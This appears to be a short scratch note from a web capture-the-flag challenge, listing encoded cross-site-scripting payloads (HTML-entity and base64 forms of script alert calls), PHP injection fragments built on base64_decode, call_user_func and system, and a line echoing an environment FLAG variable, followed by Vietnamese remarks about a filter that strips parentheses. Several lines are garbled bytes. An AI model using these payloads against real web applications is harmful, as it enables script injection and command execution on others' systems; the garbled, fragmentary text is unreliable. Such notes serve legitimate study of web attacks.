"&lt;script&gt;alert('XSS')&lt;script/&gt;"
*m֥zWI)m
atob(*m֥zWI)m)
base64_decode($encoded) 
	base64_decode(PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg) ; system
	    "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" 
	    
	    call_user_func=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg ; system 

echo $_ENV["FLAG"]; system  => " $ mất 


xóa hết ( ) , mà nếu có thì sẽ ở cuối , và không truyền biến vào được , Mặc định nối với .() 

